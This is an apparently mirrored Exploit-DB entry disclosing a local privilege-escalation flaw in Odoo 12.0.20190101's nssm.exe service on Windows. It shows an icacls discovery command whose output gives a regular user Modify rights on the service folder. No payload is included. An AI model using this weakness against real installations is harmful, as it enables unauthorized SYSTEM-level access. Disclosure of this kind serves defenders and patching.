Odoo 12.0.20190101 – ‘nssm.exe’ Unquoted Service Path

• Exploit Database
• 14 阅读

• 作者： 1F98D
  日期： 2021-05-11
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/49857/

• # Exploit Title: Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path
  # Exploit Author: 1F98D
  # Vendor Homepage: https://www.odoo.com/
  # Software Link:https://nightly.odoo.com/12.0/nightly/windows/odoo_12.0.20190101.exe
  # Tested Version: 12.0.20190101
  # Tested on OS: Windows 
  # Step to discover Unquoted Service Path:
  
  C:\> icacls "C:\Program Files (x86)\Odoo 12.0\nssm"
  
  C:\Program Files (x86)\Odoo 12.0\nssm pc-1\user-1:(OI)(CI)(M)
  NT SERVICE\TrustedInstaller:(I)(F)
  NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
  NT AUTHORITY\SYSTEM:(I)(F)
  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
  BUILTIN\Administrators:(I)(F)
  BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
  BUILTIN\Users:(I)(RX)
  BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
  CREATOR OWNER:(I)(OI)(CI)(IO)(F)
  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
  APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)
  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
  APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE)